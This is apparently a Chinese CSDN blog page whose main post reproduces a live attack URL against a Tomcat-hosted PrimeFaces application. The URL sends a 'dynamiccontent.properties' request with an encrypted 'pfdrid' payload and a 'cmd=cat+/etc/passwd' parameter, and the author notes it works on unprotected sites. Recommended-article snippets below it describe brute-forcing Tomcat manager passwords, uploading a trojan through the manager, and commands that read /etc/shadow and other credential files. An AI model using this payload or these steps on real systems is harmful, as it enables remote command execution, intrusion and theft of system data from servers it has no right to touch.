服务器tomcat中的no文件,tomcat做web服务器远程查看/etc/passwd文件漏洞

最新推荐文章于 2023-12-28 19:49:25 发布
最新推荐文章于 2023-12-28 19:49:25 发布
阅读量603 收藏
点赞数

Web安全 未授权访问 系统敏感信息 动态内容 参数过滤
关键词由CSDN通过智能技术生成

这是在实际工作中碰到的攻击:

http:/url/javax.faces.resource/dynamiccontent.properties.htm?cmd=cat+/etc/passwd&pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D

在没有防护的网站上还真的能看到/etc/passwd文件

达布斯
关注
漏洞挖掘】——75、任意文件读取攻防原理
Fly_鹏程万里
06-11 120
web安全任意文件读取漏洞是非常常见的一种漏洞,属于文件操作类漏洞,一般常见于PHP/java/python语言,任意文件读取漏洞,顾名思义就是可以任意读取服务器上部分或者全部文件漏洞,攻击者利用此漏洞可以读取服务器敏感文件如/etc/passwd,/etc/sadow,web.config等,漏洞一般存在于文件下载参数,文件包含参数,主要是由于程序对传入的文件名或者文件路径没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露。
阿里云服务器搭建java环境(jdk+tomcat+oracle11g)
程序猿
10-31 269
一、JDK配置 1、在centos 7的更新源有JDK,使用yum即可下载安装 查看版本 [root@localhost ~]# yum search java|grep jdk 选择需要版本进行安装 [root@localhost ~]# yum install java-1.8.0-openjdk.x86_64 //安装目录是在: /usr/lib/jvm/java-1.8.0-op...
服务器tomcat的no文件,安装Tomcat出现的问题
weixin_39629093的博客
08-10 363
在win10安装了JDK9并配置好了相关路径,在Tomcat在启动过程出现startup.bat时闪退。先要找出问题的原因:右键编辑打开“startup.bat"文件,然后找文件的最后一行代码是:end 在:end的后面输入pause如下图所示:接下来在DOS命令窗口运行startup.bat,此时提示报错信息如下:the JRE_HOME environment variable is not...
Linux centos7.X下tomcat开机启动访问
weixin_42842733的博客
12-17 139
由于业务需求,需要实现动态域名自动更新ip所以写了一个tomcat程序进行计划任务,因为要开机启动所以研究了一下。 1.vi /etc/rc.d/rc.local 2.添加tomcat启动的jdk配置 export JAVA_HOME=/usr/lib/jvm/java-1.7.0-openjdk-1.7.0.191-2.6.15.4.el7_5.x86_64 =后面是你们自己的 jdk安装路径...
【获取/etc/passwd文件后的入侵方式】
最新发布
weixin_46356409的博客
12-28 1503
获取到/etc/passwd文件对于黑客来说可能是一个有价值的信息来源,因为这个文件通常包含了Linux系统所有用户的信息(用户名、用户ID等)。在成功提升权限后,黑客开始窃取敏感数据。首先,黑客可以分析/etc/passwd文件,了解目标系统上的用户列表,找出可能的弱点。需要注意的是,这些步骤并不是一成不变的,具体的攻击过程可能因黑客的目标、技能和目标系统的具体情况而有所不同。黑客使用了名为OWASP ZAP的工具,对Web应用程序进行了深入的扫描,并发现了一个存在于Web应用程序的SQL注入漏洞
TOMCAT用户密码设置
yzkzoo
10-23 1248
 编者按:现在开发Java Web应用,建立和部署Web内容是一件很简单的工作。使用Jakarta Tomcat作为Servlet和JSP容器的人已经遍及全世界。Tomcat具有免费、跨平台等诸多特性,并且更新得很快,现在非常的流行。    你所需要的就是:按照你的需求配置Tomcat,只要你正确配置,Tomcat一般都能适合你的要求。下面是一系列关于Tomcat的配置技巧,这些技巧源自
more /etc/passwd
陪咖啡喝女人
11-15 1840
又离三十岁年近了一岁,仿佛自己越来越想远离IT这个非正常的行业,这就好像是一种年龄段的心态在作祟,到底该怎么?生活又该如何进行下去?内心突然一片的空白,不知道何去何从。要我想起了刚毕业时候的自己,站在了人生的十字路口,就这么站在路口,有人要我往东走,有人要我往西走,而我却选择了自己往北走,于是一路的走了下来。而面临着现在的岁数,再次的站在了十字路口,我却迷茫了,是的,工作的方向是那么的明确,而生
Linux——/etc/passwd文件(管理用户和组)
hutongkoudemihu的博客
06-25 5044
Linux系统是多用户多任务的分时操作系统,要能到不同的用户能同时访问不同的文件,允许不同的用户从本地登录或远程登录,这时用户必须拥有一个合法的账号,Linux系统正是通过账号来实现对用户的访问进行控制的,因此,需要对用户与组进行有效的管理。用户的账号一方面能帮助系统管理员对使用系统的用户进行跟踪,并控制他们对系统资源的访问;另一方面也能帮助用户组织文件,并为用户提供安全性保护。每个用户账号都拥有一个唯一的用户名和用户口令。用户在登录时键入正确的用户名和口令后,才能进入系统和自己的主目录。
Linux下java web服务器搭建(jdk6 apache+2Tomcat6+svn).doc
06-11
【Linux下Java Web服务器搭建(JDK6 + Apache + 2个Tomcat + SVN)】 在Linux环境下构建Java Web服务器通常涉及到多个组件的安装与配置,主要包括Java开发工具包(JDK)、Apache HTTP服务器Tomcat应用服务器以及...
cat /etc/pam.d/system-auth cat /etc/pam.d/sshd cat /etc/profile cat /etc/passwd 查看密码 cat /etc/shadow cat /etc/group cat /etc/hosts.equiv cat /etc/hosts.rhosts ps aux |grep telnet ps aux |grep rlogin ps aux |grep ftp cat /etc/group cat /etc/ssh/sshd_config umask ls -l /etc/passwd ls -l /etc/group ls -l /etc/shadow ls -l /etc/xinetd.conf ls -l /etc/sudoers ls -l /etc/httpd.conf ls -l /etc/httpd-mpm.conf ls -l /etc/conf/tomcat-users.xml ls -l /etc/conf/web.xml ls -l /etc/conf/server.xml ls -l /etc/my.cnf ls -l /var/mysqllog/logbin.log ps aux | grep syslogd ps aux | grep rsyslogd service syslog status service rsyslog status ps aux | grep audit service auditd status ps aux |grep ssh ls -l /var/log/messages ls -l /var/log/secure ls -l /var/log/audit/audit.log tail -20 /var/log/messages tail -20 /var/log/audit/audit.log tail -n 20 /var/log/messages tail -n 20 /var/log/audit/audit.log cat /etc/logrotate.conf cat /etc/rsyslog.conf auditctl -s auditctl -l lsof -i:21 lsof -i:22 lsof -i:23 这些命令的意思
07-21
21. `ls -l /etc/conf/tomcat-users.xml`: 显示 `/etc/conf/tomcat-users.xml` 文件的详细信息,该文件包含了 Tomcat 服务器的用户配置。 22. `ls -l /etc/conf/web.xml`: 显示 `/etc/conf/web.xml` 文件的详细信息...
记一次暴力破解tomcat后台密码(附带python脚本)
Alone hackers的博客
08-07 6000
记一次暴力破解tomcat后台密码(附带python脚本)
Tomcat 默认名称无密码攻击全过程
susam6854的博客
03-11 589
有些 Tomcat 安装之后没有修改默认密码(用户名 admin ,密码为空)或者密码太过简单,这样别人就可以轻易登录进去。   A 登录 Tomcat 管理界面 。     大意的管理员们, 你看吧, 别人轻易就进了 Tomcat 的管理界面。   好戏马上要上场!!!!   B .发布你的木马到 Server 上 1. 找到 Deploy ...
/etc/passwd和/etc/shadow详解
u013181485的博客
10-10 3581
/etc/passwd和/etc/shadow 1./etc/password [root@tomcat-01 bin]# cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4
Tomcat靶机渗透
weixin_56306210的博客
12-28 2526
Tomcat靶机渗透
Tomcat 幽灵猫任意文件读取漏洞(CVE-2020-1938)
Li-D的博客
09-16 3563
漏洞描述 Tomcat服务器是一个免费的开放源代码的Web应用服务器,属于轻量级应用服务器Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件漏洞影响版本 Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 漏洞危害 攻击者可利用该漏洞进行任意文
Linux学习笔记
俊伟的博客
02-06 402
Linux linux基础 介绍 Linux是一款操作系统,免费、开源、安全、高效、稳定、处理高并发非常强悍,很多的企业级项目都部署到Linux/unit服务器运行。 Linux目录结构 Linux的文件系统采用级层式的目录结构,最上层是根目录“/”,然后再此目录下创建其他的目录。在Linux,一切皆文件。 具体目录结构: /bin(/usr/bin、/usr/local/bin)Binnary的缩写,存放最经常使用的命令。 /sbin(/usr/sbin、/usr/local/sbin)s指supe
tomcat配置技巧
08-23 1125
1. 配置系统管理(Admin Web Application) 大多数商业化的J2EE服务器都提供一个功能强大的管理界面,且大都采用易于理解的Web应用界面。Tomcat按照自己的方式,同样提供一个成熟的管理工具,并且丝毫不逊于那些商业化的竞争对手。Tomcat的Admin Web Application最初在4.1版本时出现,当时的功能包括管理context、data source、user和
tomcat控制台密码爆破及加固方法
凝聚力安全团队
07-25 3594
tomcat控制台密码爆破简介tomcat控制台地址tomcat加密方式环境搭建工具讲解与使用hydra(九头蛇)msfconsolecheek_tomcatburp加固方案 简介 此次讲解tomcat控制台爆破,会讲到4种工具的使用,在发现服务存在tomcat并且 8080 tomcat控制台地址 tomcat加密方式 环境搭建 工具讲解与使用 hydra(九头蛇) windows版下载地址: https://github.com/maaaaz/thc-hydra-windows msfconso
Tomcat配置技巧精华详解
baggio785的专栏
01-24 1379
1、配置系统管理(Admin Web Application)    大多数商业化的J2EE服务器都提供一个功能强大的管理界面,且大都采用易于理解的Web应用界面。Tomcat按照自己的方式,同样提供一个成熟的管理工具,并且丝毫不逊于那些商业化的竞争对手。Tomcat的Admin Web Application最初在4.1版本时出现,当时的功能包括管理context、data source、use
阿里云CentOS7服务器部署Java-Tomcat-Mysql-Redis详细教程
"本资源详细介绍了在Linux服务器(CentOS 7)环境下,如何部署Java应用服务器(Tomcat),数据库(Mysql 5.7)以及缓存服务(Redis)。首先,进行了服务器的基础配置,包括修改Vim设置以显示行号、变更SSH默认端口以提高安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值